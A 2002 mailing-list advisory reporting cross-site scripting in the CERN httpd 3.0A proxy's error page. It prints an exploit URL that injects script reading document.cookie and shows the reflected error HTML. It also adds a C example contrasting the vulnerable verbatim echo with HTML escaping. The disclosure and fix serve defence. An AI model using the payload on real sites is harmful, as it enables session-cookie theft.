CERN Proxy Server: Cross-Site Scripting Vulnerability

From: TAKAGI, Hiromitsu (takagi.hiromitsuat_private)
Date: Sun Aug 11 2002 - 16:41:40 PDT

    CERN Proxy Server: Cross-Site Scripting Vulnerability
    =====================================================
    
    Affected:
      CERN HTTPD 3.0A
      http://www.w3.org/Daemon/Activity.html
      
    Vendor Status:
      CERN httpd team (httpdat_private) was notified on Aug 10, 2001 but
      they did not respond.
    
    Exploit:
      http://nonexistenthost.google.com/>document.write(document.cookie)</SCRIPT>
    
      ========================================================
      <HTML>
      <HEAD>
      <TITLE>Error Message</TITLE>
      </HEAD>
      <BODY>
      <H1>Fatal Error 500</H1>
      Can't Access Document:  http://nonexistenthost.google.com/>document.write(document.cookie)</SCRIPT>.
      <P>
      <B>Reason:</B> Can't locate remote host:  nonexistenthost.google.com.
      <P>
    ...snip...
      ========================================================
    
      Similar problems have been found in Proxomitron Naoko-4 BetaFour,
      Microsoft ISA Server and Squid 2.4 DEVEL4.
      <http://www.securityfocus.com/bid/3087>
      <http://www.microsoft.com/technet/security/bulletin/MS01-045.asp>
      <http://www.securityfocus.com/archive/1/197606>
    
    
    Best regards,
    --
    Hiromitsu Takagi
    http://staff.aist.go.jp/takagi.hiromitsu/
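The error page quoted in the advisory copies the requested URL into the HTML body unchanged. The following is an added example, not CERN httpd source and not part of the original message, showing that pattern beside a version that escapes HTML metacharacters first; `html_escape`, `render_error` and the sample URL are hypothetical names and constructed input.

```c
#include <stdio.h>
#include <string.h>

/* Escape HTML metacharacters; returns bytes written, or -1 if out is too small. */
int html_escape(const char *in, char *out, size_t outsz)
{
    size_t n = 0;
    for (; *in; in++) {
        const char *rep = NULL;
        switch (*in) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t len = rep ? strlen(rep) : 1;
        if (n + len >= outsz) return -1;      /* keep room for the NUL */
        if (rep) memcpy(out + n, rep, len);
        else out[n] = *in;
        n += len;
    }
    out[n] = '\0';
    return (int)n;
}

/* escape=0: URL copied verbatim (the behaviour reported); escape=1: hardened. */
int render_error(const char *url, int escape, char *page, size_t pagesz)
{
    char safe[1024];
    if (escape) {
        if (html_escape(url, safe, sizeof safe) < 0) return -1;  /* fail closed */
        url = safe;
    }
    int n = snprintf(page, pagesz,
        "<HTML>\n<HEAD>\n<TITLE>Error Message</TITLE>\n</HEAD>\n<BODY>\n"
        "<H1>Fatal Error 500</H1>\nCan't Access Document:  %s.\n</BODY>\n</HTML>\n", url);
    return (n < 0 || (size_t)n >= pagesz) ? -1 : 0;
}

int main(void)
{
    /* Constructed request URL carrying harmless markup. */
    const char *url = "http://nonexistenthost.example/<i>marker</i>";
    char page[2048];
    if (render_error(url, 0, page, sizeof page) == 0) printf("--- verbatim ---\n%s", page);
    if (render_error(url, 1, page, sizeof page) == 0) printf("--- escaped ---\n%s", page);
    return 0;
}
```

In the escaped output the markup from the URL appears as literal text (`&lt;i&gt;marker&lt;/i&gt;`) instead of being parsed by the browser as part of the error page.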
    



    This archive was generated by hypermail 2b30 : Mon Aug 12 2002 - 16:58:01 PDT